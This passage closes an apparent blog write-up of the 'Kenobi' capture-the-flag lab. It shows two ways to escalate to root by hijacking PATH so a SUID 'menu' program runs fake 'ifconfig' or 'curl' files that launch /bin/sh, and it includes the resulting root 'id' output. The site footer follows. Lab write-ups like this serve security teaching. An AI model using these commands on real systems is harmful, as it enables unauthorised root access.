<pre tabindex="0"><code>kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
</code></pre><p>Perfect! We can see that the Kenobi user has two locations (/home/kenobi/bin and /home/kenobi/.local/bin/) that we can inject our malicious versions of curl, uname and/or ifconfig into. Alternatively, we can modify the PATH variable to include any directory we choose.</p>
<p>Now we can use this information to try and get a root shell on the server. All three programs used by the menu program</p>
<p>Option 1:</p>
<pre tabindex="0"><code>kenobi@kenobi:/tmp$ mkdir /home/kenobi/bin/
kenobi@kenobi:/tmp$ echo /bin/sh &gt; /home/kenobi/bin/ifconfig
kenobi@kenobi:/tmp$ chmod 777 /home/kenobi/bin/ifconfig
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#
</code></pre><p>Option 2:</p>
<pre tabindex="0"><code>kenobi@kenobi:/~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh &gt; /tmp/curl
kenobi@kenobi:/tmp$ chmod 777 /tmp/curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#
</code></pre><p>Congratulations! We now have full root permissions on the server and can grab the root flag.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/felsec" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://bsky.app/profile/felsec.bsky.social" target="_blank" rel="noopener noreferrer me"
    title="Bluesky">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="currentColor" stroke="none" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
    d="M11.999,10.236c0.321,-0.524 0.916,-1.507 1.405,-2.376c0.755,-1.344 1.692,-2.852 2.869,-4.028c1.283,-1.281 2.845,-2.171 4.739,-2.171c1.144,-0 1.864,0.585 2.299,1.497c0.486,1.017 0.545,2.551 0.51,3.883c-0.051,1.945 -0.232,3.337 -0.505,4.275c-0.229,0.786 -0.543,1.303 -0.878,1.615c-0.892,0.833 -1.8,1.263 -2.634,1.484c0.029,0.018 0.056,0.036 0.084,0.055c0.528,0.367 0.823,0.79 1.081,1.107c0.648,0.794 0.644,1.795 0.23,2.784c-0.481,1.151 -1.533,2.279 -2.12,2.773c-1.389,1.171 -2.506,1.362 -3.383,1.133c-0.88,-0.23 -1.59,-0.932 -2.156,-1.826c-0.45,-0.71 -0.817,-1.537 -1.176,-2.186c-0.115,-0.208 -0.302,-0.455 -0.406,-0.587c-0.02,0.019 -0.04,0.04 -0.056,0.058c-0.121,0.145 -0.234,0.328 -0.349,0.531c-0.363,0.644 -0.721,1.463 -1.157,2.166c-0.555,0.895 -1.252,1.597 -2.12,1.825c-0.863,0.227 -1.97,0.037 -3.363,-1.136c-0.586,-0.494 -1.638,-1.622 -2.119,-2.773c-0.414,-0.989 -0.418,-1.99 0.229,-2.784c0.258,-0.317 0.554,-0.74 1.082,-1.106c0.027,-0.019 0.055,-0.038 0.084,-0.056c-0.834,-0.221 -1.742,-0.651 -2.634,-1.484c-0.335,-0.312 -0.649,-0.829 -0.878,-1.615c-0.273,-0.938 -0.454,-2.33 -0.505,-4.275c-0.036,-1.332 0.024,-2.866 0.509,-3.883c0.435,-0.912 1.156,-1.497 2.3,-1.497c2.32,0 4.109,1.203 5.494,2.808c1.272,1.474 2.195,3.283 2.9,4.643c0.231,0.447 0.436,0.84 0.624,1.146Zm-0.01,5.653l0.296,0.031l0.271,0.086c0.208,0.088 0.413,0.229 0.607,0.428c0.455,0.467 0.882,1.369 1.36,2.284c0.249,0.477 0.518,0.958 0.841,1.339c0.231,0.274 0.483,0.502 0.805,0.569c0.488,0.103 1.052,-0.157 1.811,-0.797c0.452,-0.38 1.274,-1.239 1.645,-2.126c0.155,-0.371 0.265,-0.75 0.022,-1.048c-0.179,-0.22 -0.366,-0.529 -0.732,-0.783c-0.536,-0.372 -1.356,-0.51 -1.905,-0.654c-0.405,-0.106 -0.715,-0.234 -0.88,-0.355l-0.284,-0.303l-0.135,-0.367l-0.008,-0.211l0.035,-0.196l0.078,-0.195l0.142,-0.209l0.198,-0.181l0.296,-0.154c0.151,-0.055 0.348,-0.092 0.587,-0.104c0.815,-0.042 2.571,0.294 4.235,-1.259c0.171,-0.159 0.288,-0.445 0.404,-0.845c0.246,-0.843 0.391,-2.096 0.438,-3.843c0.024,-0.91 0.026,-1.938 -0.208,-2.738c-0.142,-0.486 -0.367,-0.891 -0.896,-0.891c-1.675,0 -2.974,0.983 -4.031,2.21c-1.179,1.369 -2.058,3.057 -2.752,4.321c-0.483,0.88 -0.902,1.573 -1.25,1.916c-0.088,0.086 -0.174,0.157 -0.257,0.214l-0.221,0.125l-0.228,0.078l-0.267,0.031l-0.274,-0.034l-0.231,-0.083l-0.219,-0.132c-0.081,-0.058 -0.164,-0.131 -0.248,-0.22c-0.327,-0.343 -0.718,-1.037 -1.174,-1.917c-0.654,-1.262 -1.497,-2.948 -2.676,-4.314c-1.067,-1.236 -2.417,-2.217 -4.203,-2.217c-0.53,0 -0.754,0.405 -0.896,0.891c-0.234,0.8 -0.232,1.828 -0.208,2.738c0.046,1.747 0.192,3 0.438,3.843c0.116,0.4 0.233,0.686 0.403,0.845c1.665,1.553 3.421,1.217 4.235,1.259c0.24,0.012 0.437,0.049 0.588,0.104l0.295,0.154l0.199,0.181l0.142,0.209l0.078,0.195l0.035,0.196l-0.009,0.211l-0.135,0.368l-0.283,0.303c-0.165,0.12 -0.476,0.248 -0.88,0.355c-0.549,0.144 -1.369,0.281 -1.905,0.653c-0.366,0.254 -0.554,0.564 -0.732,0.783c-0.243,0.298 -0.133,0.677 0.022,1.048c0.371,0.887 1.193,1.746 1.645,2.127c0.757,0.637 1.311,0.9 1.789,0.8c0.311,-0.066 0.55,-0.29 0.772,-0.557c0.315,-0.381 0.577,-0.86 0.822,-1.337c0.394,-0.763 0.752,-1.521 1.138,-2.01c0.431,-0.544 0.929,-0.815 1.455,-0.815Z" style="fill-rule:nonzero;"/>
</svg>
</a>
<a href="/index.xml" target="_blank" rel="noopener noreferrer me"
    title="Rss">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M4 11a9 9 0 0 1 9 9" />
    <path d="M4 4a16 16 0 0 1 16 16" />
    <circle cx="5" cy="19" r="1" />
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2026 FelSec.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer>







    
    <script src="https://felsec.com/js/main.min.4ee188e1744c19816e95a540b2650ed9f033ea0371e74eac8e717355cfca8741.js" integrity="sha256-TuGI4XRMGYFulaVAsmUO2fAz6gNx506sjnFzVc/Kh0E="></script>

    

</body>
</html>
